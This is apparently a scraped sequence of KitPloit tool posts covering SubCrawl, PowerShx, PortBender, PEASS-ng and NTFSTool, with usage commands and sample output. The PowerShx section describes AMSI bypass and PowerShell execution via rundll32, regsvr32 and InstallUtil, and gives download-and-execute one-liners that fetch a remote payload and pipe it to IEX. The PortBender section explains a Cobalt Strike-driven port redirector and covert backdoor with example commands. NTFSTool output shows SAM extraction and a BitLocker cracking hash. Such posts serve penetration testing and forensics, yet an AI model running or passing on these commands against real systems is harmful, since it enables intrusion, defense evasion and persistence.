Sample output:



To add additional YARA rules, you can add .YAR files to the yara-rules folder, and then include the rule file by adding an include statement to combined-rules.yar.


ClamAV

The ClamAV processing module is used to scan HTTP response content during scanning with ClamAV. If a match is found, it is provided to the various output modules. To invoke this processing module, provide the value ClamAVProcessing as a processing module argument. For example, the following command will load the ClamAV processing module and produce output to the console via the ConsoleStorage storage module.

python3 subcrawl.py -p ClamAVProcessing -s ConsoleStorage

Sample output:



To utilize this module, ClamAV must be installed. From a terminal, install ClamAV using the APT package manager:

$ sudo apt-get install clamav-daemon clamav-freshclam clamav-unofficial-sigs

Once installed, the ClamAV update service should already be running. However, if you want to manually update using freshclam, ensure that the service is stopped:

sudo systemctl stop clamav-freshclam.service

And then run freshclam manually:

$ sudo freshclam

Finally, check the status of the ClamAV service:

$ sudo systemctl status clamav-daemon.service

If the service is not running, you can use systemctl to start it:

$ sudo systemctl start clamav-daemon.service

Payload

The Payload processing module is used to identify HTTP response content using the libmagic library. Additionally, SubCrawl can be configured to save content of interest, such as PE files or archives. To invoke this processing module, provide the value PayloadProcessing as a processing module argument. For example, the following command will load the Payload processing module and produce output to the console:

python3 subcrawl.py -p PayloadProcessing -s ConsoleStorage

There are no additional dependencies for this module.

Sample output:



Storage Modules

Storage modules are called by the SubCrawl engine after all URLs from the queue have been scanned. They were designed with two objectives in mind. First, to obtain the results from scanning immediately after finishing the scan queue and secondly to enable long-term storage and analysis. Therefore we not only implemented a ConsoleStorage module but also an integration for MISP and an SQLite storage module.


Console

To quickly analyse results directly after scanning URLs, a well-formatted output is printed to the console. This output is best suited for when SubCrawl is used in run-once mode. While this approach worked well for scanning single domains or generating quick output, it is unwieldy for long-term research and analysis.

Β 


SQLite

Since the installation and configuration of MISP can be time-consuming, we implemented another module which stores the data in an SQLite database. To present the data to the user as simply and clearly as possible, we also developed a simple web GUI. Using this web application, the scanned domains and URLs can be viewed and searched with all their attributes. Since this is only an early version, no complex comparison features have been implemented yet.



MISP

MISP is an open-source Intelligence Platform" href="https://www.kitploit.com/search/label/Threat%20Intelligence%20Platform">threat intelligence platform with a flexible data model and API to store and analyze threat data. SubCrawl stores crawled data in MISP events, publishing one event per domain and adding any identified open directories as attributes. MISP also allows users to define tags for events and attributes. This is helpful for event comparison and link analyses. Since this was one of our primary research goals, we enriched the data from URLHaus when exporting SubCrawl’s output to MISP. URLHaus annotates its data using tags which can be used to identify a malware family or threat actor associated with a URL. For each open directory URL, the module queries locally-stored URLHaus data and adds URLHaus tags to the MISP event if they match. To avoid having a collection of unrelated attributes for each MISP event, we created a new MISP object for scanned URLs, called opendir-url. This ensures that related attributes are kept together, making it easier to get an overview of the data.


Β 

Building your own Modules

Templates for processing and storage modules are provided as part of the framework.


Processing Modules

Processing modules can be found under crawler->processing and a sample module file example_processing.py found in this directory. The template provides the necessary inheritance and imports to ensure execution by the framework. The init function provides for module initialization and receives an instance of the logger and the global configuration. The logger is used to provide logging information from the processing modules, as well as throughout the framework.

The process function is implemented to process each HTTP response. To this end, it receives the URL and the raw response content. This is where the work of the module is implemented. This function should return a dictionary with the following fields:

  • hash: the sha256 of the content
  • url: the URL the content was retrieved from
  • matches: any matching results in the module, For example, libmagic or YARA results.

A unique class name must be defined and is used to define this module when including it via the -p argument or as a default processing module in the configuration file.

Finally, add an import statement in __init__.py, using your class name:

from .<REPLACE>_processing import <REPLACE>Processing

Storage Modules

Storage modules can be found under crawler->storage and a sample module file example_storage.py found in this directory. Similar to the processing modules, init function provides for module initialization and receives an instance of the logger and the global configuration. The store_results function receives structured data from the engine at intervals defined by the batch size in the configuration file.

A unique class name must be defined and is used to load the module when including it via the -s argument or as a default processing module in the configuration file.


Presentations and Other Resources

2021:


License

SubCrawl is licensed under the MIT license



βœ‡ KitPloit - PenTest & Hacking Tools

PowerShx - Run Powershell Without Software Restrictions

By: Zion3R β€”


Unmanaged PowerShell execution using DLLs or a standalone executable.


Introduction

PowerShx is a rewrite and expansion on the PowerShdll project. PowerShx provide functionalities for bypassing AMSI and running PS Cmdlets.


Features
  • Run Powershell with DLLs using rundll32.exe, installutil.exe, regsvcs.exe or regasm.exe, regsvr32.exe.
  • Run Powershell without powershell.exe or powershell_ise.exe
  • AMSI Bypass features.
  • Run Powershell scripts directly from the command line or Powershell files
  • Import Powershell modules and execute Powershell Cmdlets.

Usage

.dll version

rundll32
rundll32 PowerShx.dll,main -e                           <PS script to run>
rundll32 PowerShx.dll,main -f <path> Run the script passed as argument
rundll32 PowerShx.dll,main -f <path> -c <PS Cmdlet> Load a script and run a PS cmdlet
rundll32 PowerShx.dll,main -w Start an interactive console in a new window
rundll32 PowerShx.dll,main -i Start an interactive console
rundll32 PowerShx.dll,main -s Attempt to bypass AMSI
rundll32 PowerShx.dll,main -v Print Execution Output to the console

Alternatives (Credit to SubTee for these techniques):
1. 
x86 - C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll
x64 - C:\Windows\Microsoft.NET\Framework64\v4.0.3031964\InstallUtil.exe /logfile= /LogToConsole=false /U PowerShx.dll
2.
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regsvcs.exe PowerShx.dll
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regsvcs.exe PowerShx.dll
3.
x86 C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe /U PowerShx.dll
x64 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\regasm.exe /U PowerShx.dll
4.
regsvr32 /s /u PowerShx.dll -->Calls DllUnregisterServer
regsvr32 /s PowerShx.dll --> Calls DllRegisterServer

.exe version
PowerShx.exe -i                          Start an interactive console
PowerShx.exe -e <PS script to run>
PowerShx.exe -f <path> Run the script passed as argument
PowerShx.exe -f <path> -c <PS Cmdlet> Load a script and run a PS cmdlet
PowerShx.exe -s Attempt to bypass AMSI.

Embedded payloads

Payloads can be embedded by updating the data dictionary "Common.Payloads.PayloadDict" in the "Common" project and calling it in the method PsSession.cs -> Handle() . Example: in Handle() method:

private void Handle(Options options)
{
// Pre-execution before user script
_ps.Exe(Payloads.PayloadDict["amsi"]);
}

Examples

Run a base64 encoded script
rundll32 PowerShx.dll,main [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex

PowerShx.exe -e [System.Text.Encoding]::Default.GetString([System.Convert]::FromBase64String("BASE64")) ^| iex

Note: Empire stagers need to be decoded using [System.Text.Encoding]::Unicode


Run a base64 encoded script
rundll32 PowerShx.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex;

PowerShx.exe -e "IEX ((new-object net.webclient).downloadstring('http://192.168.100/payload-http'))"

Requirements

.NET 4


Known Issues

Some errors do not seem to show in the output. May be confusing as commands such as Import-Module do not output an error on failure. Make sure you have typed your commands correctly.

In dll mode, interractive mode and command output rely on hijacking the parent process' console. If the parent process does not have a console, use the -n switch to not show output otherwise the application will crash.

Due to the way Rundll32 handles arguments, using several space characters between switches and arguments may cause issues. Multiple spaces inside the scripts are okay.



βœ‡ KitPloit - PenTest & Hacking Tools

PortBender - TCP Port Redirection Utility

By: Zion3R β€”


PortBender is a TCP port redirection utility that allows a red team operator to redirect inbound traffic destined for one TCP port (e.g., 445/TCP) to another TCP port (e.g., 8445/TCP). PortBender includes an aggressor script that operators can leverage to integrate the tool with Cobalt Strike. However, because the tool is implemented as a reflective DLL, it can integrate with any C2 framework supporting loading modules through a "ReflectiveLoader" interface [1]. The tool also allows operators to simulate a backdoor/persistence mechanism leveraged within the "PortServ.sys" capability used by the Duqu 2.0 threat actor.


Design

PortBender leverages the WinDivert library to intercept network traffic using the Windows Filtering Platform (WFP). The design of PortBender is heavily influenced by the DivertTCPConn utility which also leverages the WinDivert library [1].


Usage

PortBender has two modes of operation. The first is "redirector mode," and the second is "backdoor mode." In "redirector mode," any connection to a targeted destination port (e.g., 445/TCP) is redirected to an alternative port (e.g., 8445/TCP). In "backdoor mode," we only redirect traffic if an attacker sends a specially formatted TCP packet to a target port (e.g., 443/TCP). PortBender then adds that client IP address to a list of backdoor clients and redirects all traffic to that target port to an alternative port (e.g., 3389/TCP). An operator can leverage this mechanism to emulate the persistence technique used by the Duqu 2.0 threat actor when compromising Kaspersky.

To execute PortBender we must first import the "PortBender.cna" script into Cobalt Strike and upload the WinDivert32.sys or WinDivert64.sys binary included in "PortBender.zip" to the target host depending on the operating system architecture. The help menu for PortBender with the example usage is shown below:

beacon> help PortBender
Redirect Usage: PortBender redirect FakeDstPort RedirectedPort
Backdoor Usage: PortBender backdoor FakeDstPort RedirectedPort Password
Examples:
PortBender redirect 445 8445
PortBender backdoor 443 3389 praetorian.antihacker

Example Usage

For example, we may wish to execute PortBender in redirector mode to perform an SMB relay attack from a compromised Windows system. To facilitate this, we can instruct PortBender to redirect all traffic to 445/TCP to an alternative port 8445/TCP running an attacker SMB service. In this example, we run the command "PortBender redirect 445 8445" to accomplish this. The expected output is below:


In this example, we want to deploy the covert persistence mechanism on a compromised Internet-facing IIS webserver. Here we run the "PortBender backdoor 443 3389 praetorian.antihacker" to instruct the backdoor service to redirect any connections to 443/TCP to 3389/TCP on the compromised host from any IP address that provides the specified "praetorian.antihacker" keyword. The expected output is shown below:

Β 

Acknowledgements
  • Arno0x0x for his work on DivertTCPConn [1]
  • Stephen Fewer for his work on Reflective DLL Injection [2]
  • Basil00 for his work on WinDivert [3]
  • Francisco Dominguez for his research into performing SMB relaying on Windows [4]

References

[1] https://github.com/Arno0x/DivertTCPconn
[2] https://github.com/stephenfewer/ReflectiveDLLInjection
[3] https://github.com/basil00/Divert
[4] https://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445



βœ‡ KitPloit - PenTest & Hacking Tools

PEASS-ng - Privilege Escalation Awesome Scripts SUITE new generation

By: Zion3R β€”


Basic Tutorial



Here you will find privilege escalation tools for Windows and Linux/Unix* and MacOS.

These tools search for possible local privilege escalation paths that you could exploit and print them to you with nice colors so you can recognize the misconfigurations easily.


Let's improve PEASS together

If you want to add something and have any cool idea related to this project, please let me know it in the telegram group https://t.me/peass or contribute reading the CONTRIBUTING.md file.


PEASS Style

Are you a PEASS fan? Get now our merch at PEASS Shop and show your love for our favorite peas


Advisory

All the scripts/binaries of the PEAS suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.


License

MIT License

By Polop(TM)



βœ‡ KitPloit - PenTest & Hacking Tools

NTFSTool - Forensics Tool For NTFS (Parser, MTF, Bitlocker, Deleted Files)

By: Zion3R β€”


NTFSTool is a forensic tool focused on NTFS volumes. It supports reading partition info (mbr, partition table, vbr) but also information on bitlocker encrypted volume, EFS encrypted files and more.

See below for some examples of the features!


Features

Forensics

NTFSTool displays the complete structure of master boot record, volume boot record, partition table and MFT file record. It is also possible to dump any file (even $mft or SAM) or parse USN journals, LogFile including streams from Alternate Data Stream (ADS). The undelete command will search for any file record marked as "not in use" and allow you to retrieve the file (or part of the file if it was already rewritten). It support input from image file or live disk but you can also use tools like OSFMount to mount your disk image. Sparse and compressed files are also supported.


Bitlocker support

For bitlocked partition, it can display FVE records, check a password and key (bek, password, recovery key), extract VMK and FVEK. There is no bruteforce feature because GPU-based cracking is better (see Bitcracker and Hashcat) but you can get the hash for these tools.


EFS support

In the current version, masterkeys, private keys and certificates can be listed, displayed and decrypted using needed inputs (SID, password). Certificates with private keys can be exported using the backup command. Reinmport the backup on another machine to be able to read your encrypted file again!

More information on Mimikatz Wiki

Decryption of EFS encrypted files is coming!


Shell

There is a limited shell with few commands (exit, cd, ls, cat, pwd, cp).


Help & Examples

Help command displays description and examples for each command. Options can be entered as decimal or hex number with "0x" prefix (ex: inode).

ntfstool help [command]
Command Description
info Display information for all disks and volumes
mbr Display MBR structure, code and partitions for a disk
gpt Display GPT structure, code and partitions for a disk
vbr Display VBR structure and code for a specidifed volume (ntfs, fat32, fat1x, bitlocker supported)
extract Extract a file from a volume.
image Create an image file of a disk or volume.
mft Display FILE record details for a specified MFT inode. Almost all attribute types supported
btree Display VCN content and Btree index for an inode
bitlocker Display detailed information and hash ($bitlocker$) for all VMK. It is possible to test a password or recovery key. If it is correct, the decrypted VMK and FVEK is displayed.
bitdecrypt Decrypt a volume to a file using password, recovery key or bek.
efs.backup Export EFS keys in PKCS12 (pfx) format.
efs.certificate List, display and export system certificates (SystemCertificates/My/Certificates).
efs.key List, display, decrypt and export private keys (Crypto/RSA).
efs.masterkey List, display and decrypt masterkeys (Protect).
fve Display information for the specified FVE block (0, 1, 2)
reparse Parse and display reparse points from $Extend$Reparse.
logfile Dump $LogFile file in specified format: csv, json, raw.
usn Dump $UsnJrnl file in specified format: csv, json, raw.
shadow List volume shadow snapshots from selected disk and volume.
streams Display Alternate Data Streams
undelete Search and extract deleted files for a volume.
shell Start a mini Unix-like shell
smart Display S.M.A.R.T data

Limitations
  • Some unsupported cases. WIP.
  • No documentation

Feel free to open an issue or ask for a new feature!


Build

Vcpkg is the best way to install required third-party libs.

Install vcpkg as described here: vcpkg#getting-started

git clone https://github.com/microsoft/vcpkg
.\vcpkg\bootstrap-vcpkg.bat

Integrate it to your VisualStudio env:

vcpkg integrate install

At build time, VisualStudio will detect the vcpkg.json file and install required packages automatically.

Current third-party libs:

  • openssl: OpenSSL is an open source project that provides a robust, commercial-grade, and full-featured toolkit for the Transport Layer Security (TLS) and Secure Sockets Layer (SSL) protocols.
  • nlohmann-json: JSON for Modern C++
  • distorm: Powerful Disassembler Library For x86/AMD64
  • cppcoro: A library of C++ coroutine abstractions for the coroutines TS.

Examples

Info
info
+-------------------------------------------------------------------------------------+
| Id | Model | Type | Partition | Size |
+-------------------------------------------------------------------------------------+
| 0 | Samsung SSD 850 EVO 500GB | Fixed SSD | GPT | 500107862016 (465.76 GiBs) |
| 1 | ST2000DM001-1ER164 | Fixed HDD | GPT | 2000398934016 (1.82 TiB) |
| 2 | 15EADS External | Fixed HDD | MBR | 1500301910016 (1.36 TiB) |
| 3 | osfdisk | Fixed HDD | MBR | 536870912 (512.00 MiBs) |
+-------------------------------------------------------------------------------------+
info disk=3
Model       : osfdisk
Version : 1
Serial :
Media Type : Fixed HDD
Size : 536870912 (512.00 MiBs)
Geometry : 512 bytes * 63 sectors * 255 tracks * 65 cylinders
Volume : MBR

+--------------------------------------------------------------------------------------------------+
| Id | Boot | Label | Mounted | Filesystem | Offset | Size |
+--------------------------------------------------------------------------------------------------+
| 1 | No | NTFSDRIVE | F:\ | Bitlocker | 0000000000000200 | 000000001ffffe00 (512.00 MiBs) |
+--------------------------------------------------------------------------------------------------+
info disk=3 volume=1
Serial Number  : 0000aa60-00002eae
Filesystem : Bitlocker
Bootable : False
Type : Fixed
Label : NTFSDRIVE
Offset : 512 (512.00 bytes)
Size : 536870400 (512.00 MiBs)
Free : 519442432 (495.38 MiBs)
Mounted : True (F:\)
Bitlocker : True (Unlocked)

MBR
mbr disk=2
MBR from \\.\PhysicalDrive2
---------------------------

Disk signature : e4589462
Reserved bytes : 0000

Partition table :
+---------------------------------------------------------------------------------------------------+
| Id | Boot | Flags | Filesystem | First sector | Last sector | Offset | Sectors | Size |
+---------------------------------------------------------------------------------------------------+
| 1 | No | Principal | NTFS / exFAT | 0 2 3 | 255 254 255 | 128 | 16771072 | 8.00 GiBs |
+---------------------------------------------------------------------------------------------------+

MBR signature : 55aa

Strings:
[63] : Invalid partition table
[7b] : Error loading operating system
[9a] : Missing operating system

Disassemble Bootstrap Code [y/N] ? y

0000 : 33c0 : xor ax, ax
0002 : 8ed0 : mov ss, ax
0004 : bc007c : mov sp, 0x7c00
0007 : 8ec0 : mov es, ax
0009 : 8ed8 : mov ds, ax
000b : be007c : mov si, 0x7c00
000e : bf0006 : mov di, 0x600
0011 : b90002 : mov cx, 0x200
...

GPT
gpt disk=1
Signature        : EFI PART
Revision : 1.0
Header Size : 92
Header CRC32 : cc72e4d3
Reserved : 00000000
Current LBA : 1
Backup LBA : 3907029167
First Usable LBA : 34
Last Usable LBA : 3907029134
GUID : {a21d6495-cd58-4b8d-b968-dc337adcf6ac}
Entry LBA : 2
Entries Num : 128
Entries Size : 128
Partitions CRC32 : 0c9a0a25

Partition table : 2 entries
+------------------------------------------------------------------------------------------------------------------------+
| Id | Name | GUID | First sector | Last sector | Flags |
+------------------------------------------------------------------------------------------------------------------------+
| 1 | Microsoft reserved partition | {da0ac4a1-a78c-4053-bab5-36c70a71fe63} | 34 | 262177 | 000000000000 |
| 2 | Basic data partition | {4b4ea4b3-64a1-4c6d-bd4b-1c2b0e4e706f} | 264192 | 3907028991 | 000000000000 |
+------------------------------------------------------------------------------------------------------------------------+

VBR
vbr disk=3 volume=1
Structure :
Jump : eb5890 (jmp 0x7c5a)
OEM id : -FVE-FS-
BytePerSector : 512
SectorPerCluster : 8
Reserved Sectors : 0
Number of FATs : 0
Root Max Entries : 0
Total Sectors : 0
Media Type : f8
SectorPerFat : 8160
SectorPerTrack : 63
Head Count : 255
FS Offset : 1
Total Sectors : 0
FAT Flags : 0000
FAT Version : 0000
Root Cluster : 0
FS Info Sector : 1
Backup BootSector: 6
Reserved : 00000000
Reserved : 00000000
Reserved : 00000000
Drive Number : 80
Reserved : 00
Ext. Boot Sign : 29
Serial Nuumber : 00000000
Volume Name : NO NAME
FileSystem Type : FAT32
Volume GUID : {4967d63b-2e29-4ad8-8399-f6a339e3d001}
FVE Block 1 : 0000000002100000
FVE Block 2 : 00000000059e4000
FVE Block 3 : 00000000092c8000
End marker : 55aa

Strings:
[00] : Remove disks or other media.Β 
[1f] : Disk errorΒ 
[2c] : Press any key to restart

Disassemble Bootstrap Code [y/N] ? y

7c5a : eb58 : jmp 0x7cb4
7c5c : 90 : nop
7c5d : 2d4656 : sub ax, 0x5646
7c60 : 45 : inc bp
7c61 : 2d4653 : sub ax, 0x5346
7c64 : 2d0002 : sub ax, 0x200
[...]

Extract
extract disk=3 volume=1 from=\bob.txt output=d:\bob.txt
Extract file from \\.\PhysicalDrive3 > Volume:1
-----------------------------------------------

[+] Opening \\?\Volume{00023d5d-0000-0000-0002-000000000000}\
[-] Source : \bob.txt
[-] Destination : d:\bob.txt
[-] Record Num : 47 (0000002fh)
[+] File extracted (42 bytes written)
extract disk=0 volume=4 --system output=d:\system
Extract file from \\.\PhysicalDrive0 > Volume:4
-----------------------------------------------

[+] Opening \\?\Volume{ee732b26-571c-4516-b8fd-32282aa8e66b}\
[-] Source : c:\windows\system32\config\system
[-] Destination : d:\system
[-] Record Num : 623636 (00098414h)
[+] File extracted (19398656 bytes written)

Image
image disk=2 volume=2 output=d:\imagevol.raw
Image from \\.\PhysicalDrive2 > Volume:2
----------------------------------------

[+] Opening \\?\Volume{f095dd1d-f302-4d17-bf68-7cc8c1de3965}\
[-] Size : 33520128 (31.97 MiBs)
[-] BlockSize: 4096
[+] Copying : [################################] 100% 0s
[+] Done
image disk=2 output=d:\image.raw
Image from \\.\PhysicalDrive2
-----------------------------

[+] Opening \\.\PhysicalDrive2
[-] Size : 67108864 (64.00 MiBs)
[-] BlockSize: 4096
[+] Copying : [################################] 100% 0s
[+] Done

MFT
mft disk=2 volume=1 inode=5 (root folder)
Created Time : 2009-12-02 02:03:31 | | | | | | Last File Write Time : 2020-02-24 19:42:23 | | | | | | FileRecord Changed Time : 2020-02-24 19:42:23 | | | | | | Last Access Time : 2020-02-24 19:42:23 | | | | | | Permissions : | | | | | | read_only : 0 | | | | | | hidden : 1 | | | | | | system : 1 | | | | | | device : 0 | | | | | | normal : 0 | | | | | | temporary : 0 | | | | | | sparse : 0 | | | | | | reparse_point : 0 | | | | | | compressed : 0 | | | | | | offline : 0 | | | | | | not_indexed : 1 | | | | | | encrypted : 0 | | | | | | Max Number of Versions : 0 | | | | | | Version Number : 0 | +------------------------------------------------------------------------------------------------------------------+ | 2 | $FILE_NAME | False | 68 | Parent Dir Record Index : 5 | | | | | | Parent Dir Sequence Num : 5 | | | | | | File Created Time : 2009-12-02 02:03:31 | | | | | | Last File Write Time : 2011-12-24 03:13:12 | | | | | | FileRecord Changed Time : 2011-12-24 03:13:12 | | | | | | Last Access Time : 1970-01-01 00:59:59 | | | | | | Allocated Size : 0 | | | | | | Real Size : 0 | | | | | | ------ | | | | | | Name : . | +------------------------------------------------------------------------------------------------------------------+ | 3 | $OBJECT_ID | False | 16 | Object Unique ID : {cce8fec5-9a29-11df-be68-0017f29 | | | | | | 8268d} | +------------------------------------------------------------------------------------------------------------------+ | 4 | $INDEX_ROOT | False | 152 | Attribute Type : 00000030h | | | | | | Collation Rule : 1 | | | | | | Index Alloc Entry Size : 4096 | | | | | | Cluster/Index Record : 1 | | | | | | ----- | | | | | | First Entry Offset : 16 | | | | | | Index Entries Size : 136 | | | | | | Index Entries Allocated : 136 | | | | | | Flags : Large Index | +------------------------------------------------------------------------------------------------------------------+ | 5 | $INDEX_ALLOCATION | True | 12288 | Index | | | | | | 0000000000000004 : $AttrDef | | | | | | 0000000000000008 : $BadClus | | | | | | 0000000000000006 : $Bitmap | | | | | | 0000000000000007 : $Boot | | | | | | 000000000000000b : $Extend | | | | | | 0000000000000002 : $LogFile | | | | | | 0000000000000000 : $MFT | | | | | | 0000000000000001 : $MFTMirr | | | | | | 000000000000002d : $RECYCLE.BIN | | | | | | 0000000000000009 : $Secure | | | | | | 000000000000000a : $UpCase | | | | | | 0000000000000003 : $Volume | | | | | | 0000000000000005 : . | | | | | | 000000000000240c : Dir1 | | | | | | 0000000000000218 : Dir2 | | | | | | 000000000000212a : Dir3 | | | | | | 0000000000000024 : Dir4 | | | | | | 0000000000000def : RECYCLER | | | | | | 000000000000001b : System Volume Information | | | | | | 000000000000001b : SYSTEM~1 | +------------------------------------------------------------------------------------------------------------------+ | 6 | $BITMAP | False | 8 | Index Node Used : 2 | +------------------------------------------------------------------------------------------------------------------+ ">
Signature         : FILE
Update Offset : 48
Update Number : 3
$LogFile LSN : 274035114
Sequence Number : 5
Hardlink Count : 1
Attribute Offset : 56
Flags : In_use | Directory
Real Size : 704
Allocated Size : 1024
Base File Record : 0
Next Attribute ID : 56
MFT Record Index : 5
Update Seq Number : 4461
Update Seq Array : 00000000

Attributes:
-----------

+------------------------------------------------------------------------------------------------------------------+
| Id | Type | Non-resident | Length | Overview |
+------------------------------------------------------------------------------------------------------------------+
| 1 | $STANDARD_INFORMATION | False | 72 | File Created Time : 2009-12-02 02:03:31 |
| | | | | Last File Write Time : 2020-02-24 19:42:23 |
| | | | | FileRecord Changed Time : 2020-02-24 19:42:23 |
| | | | | Last Access Time : 2020-02-24 19:42:23 |
| | | | | Permissions : |
| | | | | read_only : 0 |
| | | | | hidden : 1 |
| | | | | system : 1 |
| | | | | device : 0 |
| | | | | normal : 0 |
| | | | | temporary : 0 |
| | | | | sparse : 0 |
| | | | | reparse_point : 0 |
| | | | | compressed : 0 |
| | | | | offline : 0 |
| | | | | not_indexed : 1 |
| | | | | encrypted : 0 |
| | | | | Max Number of Versions : 0 |
| | | | | Version Number : 0 |
+------------------------------------------------------------------------------------------------------------------+
| 2 | $FILE_NAME | False | 68 | Parent Dir Record Index : 5 |
| | | | | Parent Dir Sequence Num : 5 |
| | | | | File Created Time : 2009-12-02 02:03:31 |
| | | | | Last File Write Time : 2011-12-24 03:13:12 |
| | | | | FileRecord Changed Time : 2011-12-24 03:13:12 |
| | | | | Last Access Time : 1970-01-01 00:59:59 |
| | | | | Allocated Size : 0 |
| | | | | Real Size : 0 |
| | | | | ------ |
| | | | | Name : . |
+------------------------------------------------------------------------------------------------------------------+
| 3 | $OBJECT_ID | False | 16 | Object Unique ID : {cce8fec5-9a29-11df-be68-0017f29 |
| | | | | 8268d} |
+------------------------------------------------------------------------------------------------------------------+
| 4 | $INDEX_ROOT | False | 152 | Attribute Type : 00000030h |
| | | | | Collation Rule : 1 |
| | | | | Index Alloc Entry Size : 4096 |
| | | | | Cluster/Index Record : 1 |
| | | | | ----- |
| | | | | First Entry Offset : 16 |
| | | | | Index Entries Size : 136 |
| | | | | Index Entries Allocated : 136 |
| | | | | Flags : Large Index |
+------------------------------------------------------------------------------------------------------------------+
| 5 | $INDEX_ALLOCATION | True | 12288 | Index |
| | | | | 0000000000000004 : $AttrDef |
| | | | | 0000000000000008 : $BadClus |
| | | | | 0000000000000006 : $Bitmap |
| | | | | 0000000000000007 : $Boot |
| | | | | 000000000000000b : $Extend |
| | | | | 0000000000000002 : $LogFile |
| | | | | 0000000000000000 : $MFT |
| | | | | 0000000000000001 : $MFTMirr |
| | | | | 000000000000002d : $RECYCLE.BIN |
| | | | | 0000000000000009 : $Secure |
| | | | | 000000000000000a : $UpCase |
| | | | | 0000000000000003 : $Volume |
| | | | | 0000000000000005 : . |
| | | | | 000000000000240c : Dir1 |
| | | | | 0000000000000218 : Dir2 |
| | | | | 000000000000212a : Dir3 |
| | | | | 0000000000000024 : Dir4 |
| | | | | 0000000000000def : RECYCLER |
| | | | | 000000000000001b : System Volume Information |
| | | | | 000000000000001b : SYSTEM~1 |
+------------------------------------------------------------------------------------------------------------------+
| 6 | $BITMAP | False | 8 | Index Node Used : 2 |
+------------------------------------------------------------------------------------------------------------------+

Btree
btree disk=0 volume=1 inode=5 (root folder)
B-tree index (inode:5) from \\.\PhysicalDrive3 > Volume:1
---------------------------------------------------------

Attributes:
-----------

+-------------------------------------------------------------------------------------------+
| Id | Type | Non-resident | Length | Overview |
+-------------------------------------------------------------------------------------------+
| 1 | $INDEX_ROOT | False | 56 | Attribute Type : Filename |
| | | | | Collation Rule : 1 |
| | | | | Index Alloc Entry Size : 4096 |
| | | | | Cluster/Index Record : 1 |
| | | | | ----- |
| | | | | First Entry Offset : 16 |
| | | | | Index Entries Size : 40 |
| | | | | Index Entries Allocated : 40 |
| | | | | Flags : Large Index |
+-------------------------------------------------------------------------------------------+
| 2 | $INDEX_ALLOCATION | True | 20480 | First VCN : 0x000000000000 |
| | | | | Last VCN : 0x000000000004 |
+-------------------------------------------------------------------------------------------+

$INDEX_ALLOCATION entries:
--------------------------

+--------------------------------------------------------------------------------------------+
| VCN | Raw address | Size | Entries |
+--------------------------------------------------------------------------------------------+
| 000000000000h | 000000024000h | 000000001000h | 000000000004: $AttrDef |
| | | | 000000000008: $BadClus |
| | | | 000000000006: $Bitmap |
....
| | | | 000000000009: $Secure |
| | | | 00000000000a: $UpCase |
| | | | 000000000003: $Volume |
+--------------------------------------------------------------------------------------------+
| 000000000001h | 000000025000h | 000000001000h | 000000000098: randomfile - Copie (5).accdb |
| | | | 000000000097: randomfile - Copie (5).bat |
| | | | 000000000095: randomfile - Copie (5).psd |
| | | | 000000000096: randomfile - Copie (5).txt |
| | | | 00000000009b: randomfile - Copie (6).accdb |
....
| | | | 000000000083: randomfile.accdb |
| | | | 000000000082: randomfile.bat |
| | | | 000000000084: randomfile.psd |
| | | | 000000000081: randomfile.txt |
| | | | 000000000024: System Volume Information |
+--------------------------------------------------------------------------------------------+
| 000000000002h | 0000007d6000h | 000000001000h | |
+--------------------------------------------------------------------------------------------+
| 000000000003h | 0000007d7000h | 000000001000h | 000000000005: . |
| | | | 000000000092: randomfile - Copie (4).txt |
+--------------------------------------------------------------------------------------------+
| 000000000004h | 0000007d8000h | 000000001000h | 000000000027: random folder |
| | | | 00000000008c: randomfile - Copie (2).accdb |
| | | | 00000000008b: randomfile - Copie (2).bat |
| | | | 000000000089: randomfile - Copie (2).psd |
....
| | | | 00000000008e: randomfile - Copie (3).txt |
| | | | 000000000094: randomfile - Copie (4).accdb |
| | | | 000000000093: randomfile - Copie (4).bat |
| | | | 000000000091: randomfile - Copie (4).psd |
+--------------------------------------------------------------------------------------------+

B-tree index:
-------------

Root
|- 000000000000:
|---- VCN: 3
|- 000000000005: .
|---- VCN: 0
|- 000000000004: $AttrDef
|- 000000000008: $BadClus
|- 000000000006: $Bitmap
....
|- 000000000009: $Secure
|- 00000000000a: $UpCase
|- 000000000003: $Volume
|- 000000000092: randomfile - Copie (4).txt
|---- VCN: 4
|- 000000000027: random folder
|- 00000000008c: randomfile - Copie (2).accdb
|- 00000000008b: randomfile - Copie (2).bat
|- 000000000089: randomfile - Copie (2).psd
....
|- 000000000094: randomfile - Copie (4).accdb
|- 000000000093: randomfile - Copie (4).bat
|- 000000000091: randomfile - Copie (4).psd
|- 000000000000 (*)
|---- VCN: 1
|- 000000000098: randomfile - Copie (5).accdb
|- 000000000097: randomfile - Copie (5).bat
|- 000000000095: randomfile - Copie (5).psd
....
|- 000000000084: randomfile.psd
|- 000000000081: randomfile.txt
|- 000000000024: System Volume Information

Bitlocker
bitlocker disk=3 volume=1
FVE Version    : 2
State : ENCRYPTED
Size : 536870400 (512.00 MiBs)
Encrypted Size : 536870400 (512.00 MiBs)
Algorithm : AES-XTS-128
Timestamp : 2020-02-26 16:39:17

Volume Master Keys:
-------------------

+--------------------------------------------------------------------------------------------------------------------+
| Id | Type | GUID | Details |
+--------------------------------------------------------------------------------------------------------------------+
| 1 | Password | {2dd368f3-37d7-414f-94e6-3c5b86fadd50} | Nonce : 01d5ecbb00f7155000000003 |
| | | | MAC : daea96439babc5d1e7f20c8860ff1ee9 |
| | | | Encrypted Key : b76281568419ec3bee89d1eddccf3169 |
| | | | 59c466b6b392f40f0875e58168d868d7 |
| | | | 0788bd366bec117b11a9fd6e |
| | | | |
| | | | JtR Hash : $bitlocker$1$16$daea96439babc5d1 |
| | | | e7f20c8860ff1ee9$1048576$12$5015 |
| | | | f700bbecd50103000000$60$175ec23c |
| | | | d799e2bde9d24bf3697919feb7628156 |
| | | | 8419ec3bee89d1eddccf316959c466b6 |
| | | | b392f40f0875e58168d868d70788bd36 |
| | | | 6bec117b11a9fd6e |
